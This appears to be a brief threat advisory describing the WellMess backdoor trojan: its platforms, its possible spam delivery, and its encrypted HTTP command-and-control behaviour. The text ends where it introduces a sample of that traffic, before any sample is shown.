WellMess Backdoor Trojan

WellMess is a newly observed backdoor trojan written in the Go or .NET languages. As a result, it can infect both Windows and Linux systems.  It is a type of malware programmed in Golang and cross-compiled to make it compatible both with Linux and Windows.

At the time of publication, it is not known how WellMess is distributed, although there are unconfirmed reports it is being delivered through small spam campaigns. Separate versions of WellMess are delivered depending on the OS targeted.

Once installed, WellMess will connect to a command and control server using RSA encrypted HTTP POST requests before executing a PowerShell script to gain administration privileges. It will then act as a backdoor for further malware installation or to execute shell commands.

The malware communicates with a C&C server using HTTP requests and performs functions based on the received commands. Below is an example of the communication: (User-Agent value varies per sample.)
